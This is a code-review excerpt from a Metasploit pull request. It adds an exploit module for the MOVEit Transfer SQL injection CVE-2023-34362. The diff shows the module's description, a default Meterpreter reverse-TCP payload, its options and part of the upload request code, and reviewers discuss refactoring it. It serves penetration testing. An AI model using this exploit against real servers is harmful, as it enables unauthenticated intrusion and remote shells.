modules/exploits/windows/http/moveit_cve_2023_34362.rb

```diff
@@ -0,0 +1,491 @@
+        'Description' => %q{
+          This module exploits an SQL injection vulnerability in the MOVEit Transfer web application
+          that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.
+          Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an
+          attacker can leverage an information leak be able to upload a .NET deserialization payload.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # PoC https://github.com/sfewer-r7/CVE-2023-34362
+          'rbowes-r7', # research
+          'bwatters-r7' # module
+        ],
+        'References' => [
+          ['CVE', '2023-34362' ],
+          ['URL', 'https://github.com/sfewer-r7/CVE-2023-34362'],
+          ['URL', 'https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis'],
+          ['URL', 'https://www.wiz.io/blog/cve-2023-34362']
+        ],
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD],
+        'Payload' => {
+          'Space' => 345
+        },
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',
+                'RPORT' => 443,
+                'SSL' => true
+              }
+            }
+          ],
+        ],
+        'DisclosureDate' => '2023-05-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
+        }
+      )
+    )
+    register_options(
+      [
+        Msf::OptString.new('TARGET_URI', [ false, 'Target URI', '/api/v1/token']),
+        Msf::OptString.new('USERNAME', [ true, 'Username', Rex::Text.rand_text_alphanumeric(5..11)]),
+        Msf::OptString.new('LOGIN_NAME', [ true, 'Login Name', Rex::Text.rand_text_alphanumeric(5..11)]),
+        Msf::OptString.new('PASSWORD', [ true, 'Password', Rex::Text.rand_text_alphanumeric(5..11)])
+
+      ]
+    )
+    @moveit_token = nil
+    @moveit_instid = nil
+    @cookies = nil
+    @guest_email_addr = "#{Rex::Text.rand_text_alphanumeric(5..12)}@#{Rex::Text.rand_text_alphanumeric(3..6)}.com"
+    @uploadfile_name = Rex::Text.rand_text_alphanumeric(8..15)
+    @uploadfile_size = rand(5..64)
+    @uploadfile_data = Rex::Text.rand_text_alphanumeric(@uploadfile_size)
+  end
+
+  def begin_file_upload(folders_json, token_json)
+    boundary = rand_text_numeric(27)
+    data = "--#{boundary}\r\n"
+    data << 'Content-Disposition: form-data;'
+    data << "name=\"name\"\r\n\r\n#{@uploadfile_name}\r\n--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"size\"\r\n\r\n#{@uploadfile_size}\r\n--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"comments\"\r\n\r\n\r\n--#{boundary}--\r\n"
```

Comment:
Would this all be able to use `Rex::MIME`?

Reply:
Or the file upload API https://github.com/rapid7/metasploit-framework/pull/16442

Reply:
I'm not sure that we could use the file upload API as we need to start the upload, but not complete it.

Reply:
Not a blocker for me :+1:

Reply:
Yeah; I tried Rex::MIME, and it failed.  It also really did not simplify the code at all.

Reply:
May I request a Trial license key for testing purposes? I send to Progress MOVEit but Not reply.